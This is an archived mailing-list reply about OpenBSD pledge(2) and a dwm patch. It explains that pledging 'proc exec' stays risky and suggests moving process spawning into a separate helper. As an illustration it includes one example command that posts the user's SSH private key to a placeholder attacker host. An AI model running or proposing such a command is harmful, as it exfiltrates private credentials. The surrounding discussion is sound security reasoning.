Re: [dev] pledge(2) patches

From: Kamil Cholewiński <harry666t_AT_gmail.com>
Date: Mon, 06 Jun 2016 13:37:43 +0200

On Mon, 06 Jun 2016, Martin Kühne <mysatyre_AT_gmail.com> wrote:
> Can it somehow be made to keep its effect across the exec family of syscalls?
>
> cheers!
> mar77i

No. This is why pledging "stdio proc exec" is still quite dangerous. A
well-designed program may try separating this functionality into a
separate utility, or at least a different process.

For example, the latest version of my dwm patch uses "stdio rpath proc
exec", which means, if e.g. there was a bug in window title handling, a
potential attacker could exploit it to run sth like "curl -d
_AT_.ssh/id_rsa http://evil.com/" or whatever else he needs to steal your
laundry.

Theoretically, such a bug could be exploited just by loading a web page
or SSHing to a remote server - even if the web browser, the terminal
emulator, the SSH client, were otherwise all secure.

But the only reason dwm needs proc and exec, is so that it can spawn st,
dmenu, etc on a keypress. This functionality could be handled by a
separate tool or a subprocess, that doesn't need to process window
titles. In such case, main dwm process could pledge to only use "stdio
rpath".

Hope this clarifies everything!

<3,K.
Received on Mon Jun 06 2016 - 13:37:43 CEST

This archive was generated by hypermail 2.3.0 : Mon Jun 06 2016 - 13:48:18 CEST